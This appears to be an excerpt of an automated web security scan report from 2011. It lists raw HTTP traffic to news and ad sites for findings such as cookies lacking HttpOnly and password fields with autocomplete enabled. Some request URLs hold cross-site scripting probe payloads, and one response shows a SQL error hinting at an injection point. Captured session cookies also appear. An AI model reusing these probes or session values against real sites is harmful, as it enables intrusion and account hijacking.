GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl?_ADTIME_ HTTP/1.1 Host: this.content.served.by.adshuffle.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=576462396875340721; ts=1/8/2011+3:06:08+AM; z=4; sid=9ceb3417-a6c7-439a-a223-e9ad8d9afb02; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html Expires: Sat, 29 Jan 2011 00:42:58 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: z=4; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 00:42:57 GMT Content-Length: 43 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?233374&click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000943795/cstr=91575939=_4d4372e7,6205162343,766161^943795^1183^0,1_/xsxdata=$xsxdata/bnum=91575939/optn=64?trg=¶ms=6205162343 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; cmggl=1; er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAADLogMAELggAAIAAByjAwCUtyAAAQAAUX0DAJW3IAABAAAgowMAELggAAEAAA=="; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:52:40 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:52:40 GMT Server: eyeReturn Ad Server Content-Length: 14762
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='7054';er_SegID='233375';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_728x90_f_30_v1.swf';er_token ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=¶ms=8830366303 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Sun, 27-Feb-2011 23:48:59 GMT; Path=/ Set-Cookie: er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/ Location: http://voken.eyereturn.com/pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=¶ms=8830366303 Content-Length: 0 Date: Fri, 28 Jan 2011 23:48:58 GMT Connection: close Server: eyeReturn Ad Serveri 6
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=¶ms=8830366303 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 28 Jan 2011 23:48:58 GMT Connection: close Server: eyeReturn Ad Serveri 6 Content-Length: 14757
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pix?223686 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:49:09 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Fri, 28 Jan 2011 23:49:08 GMT Connection: close Server: eyeReturn Ad Serveri 6
The following cookie was issued by the application and does not have the HttpOnly flag set:
Coyote-2-a0f0083=a0f021f:0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:03:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92625
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
dcisid=3244834828.1127760205.2705065472; path=/
bandType=broadband;DOMAIN=.aol.com;PATH=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244834828.1127760205.2705065472; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 28 Jan 2011 15:05:58 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31059 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm29 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tal_products/chat.aspx?ac=PPC.B.live%20chat HTTP/1.1 Host: www.moxiesoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:10:48 GMT Server: Apache X-Drupal-Cache: MISS Last-Modified: Fri, 28 Jan 2011 14:10:48 +0000 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 ETag: "1296223848" Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=798638bea14b1d09568b917696e409a0; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/ Content-Length: 95223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:10:49 GMT Server: Apache X-Drupal-Cache: MISS Last-Modified: Fri, 28 Jan 2011 14:10:49 +0000 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 ETag: "1296223849" Set-Cookie: SESS4b6fdd449e798eeea778eb52d9a68097=13e7f46734298e8a605b9431d8cfd80d; expires=Sun, 20-Feb-2011 17:44:09 GMT; path=/; domain=.nydailynews.com; HttpOnly Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en Set-Cookie: NSC_wjq-cmpht-8080=4459351229a0;expires=Fri, 28-Jan-11 14:18:22 GMT;path=/ Content-Length: 102098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /client.aspx HTTP/1.1 Host: www.parkersoft.co.uk Proxy-Connection: keep-alive Referer: http://www.whoson.com/installable.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /supnotes.aspx HTTP/1.1 Host: www.parkersoft.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 13:58:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wd23wlvl4tjcz4554zaqcfyv; path=/; HttpOnly Set-Cookie: whoson=584-50288.6160842; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 28775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 15:00:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 15:00:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 15:06:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--[if IE 7]><![endif]--> <!--[if lt IE 7]><![endif]--> <html xmlns="http:// ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /zat?r=&url=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ea7771aeaee3%3D1&uid=Xu3uTnqUd1-EIF3JztHR7Q&src=zmp&pid=150&pt=homepage&sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220&type=view&cm=featured&oids=e%3A139733045%2Ce%3A155300665%2Ce%3A147270025%2Ce%3A142549185%2Ce%3A148455425%2Ce%3A151637365%2Ce%3A154912025%2Ce%3A155222925%2Ce%3A152086945%2Ce%3A161856385&spids=&__t=1296236235556 HTTP/1.1 Host: www.zvents.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: xads.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 15:06:31 GMT Server: ZEDO 3G Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/; Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ Vary: Accept-Encoding Content-Length: 402 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ ...[SNIP]...
12. Password field with autocomplete enabledpreviousnext There are 175 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password fields with autocomplete enabled:
password
confirm_password
Request
GET /track/inside_track/view.bg?articleid=1312557&format=comments&srvc=track&position=2 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:46 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-language: en Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 69819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The form contains the following password fields with autocomplete enabled:
password
confirm_password
Request
GET /track/star_tracks/view.bg?articleid=1312549&format=comments&srvc=track&position=3 HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:51 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 67934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The form contains the following password field with autocomplete enabled:
password
Request
GET /users/login HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:31 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 30741
The page contains a form with the following action URL:
http://bostonherald.com/users/register/
The form contains the following password fields with autocomplete enabled:
password
confirm_password
Request
GET /users/register/ HTTP/1.1 Host: bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:31 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 05:21:14 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 37175
The form contains the following password field with autocomplete enabled:
password
Request
GET /submit?phase=2&url=http://www.bostonherald.com HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://support.moxiesoft.com/login.asp
The form contains the following password field with autocomplete enabled:
txtPasswd
Request
GET / HTTP/1.1 Host: support.moxiesoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 14:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 25701 Content-Type: text/html Expires: Fri, 28 Jan 2011 14:10:59 GMT Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/ Cache-control: private
<!-- Function getOwnerIDforUser(sEmailId) Dim objUser Dim sSql Dim objADOConnection Dim sconnString Dim objOwnerId
Set objADOConnection = Server.CreateObject("ADODB.Connection")
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET / HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
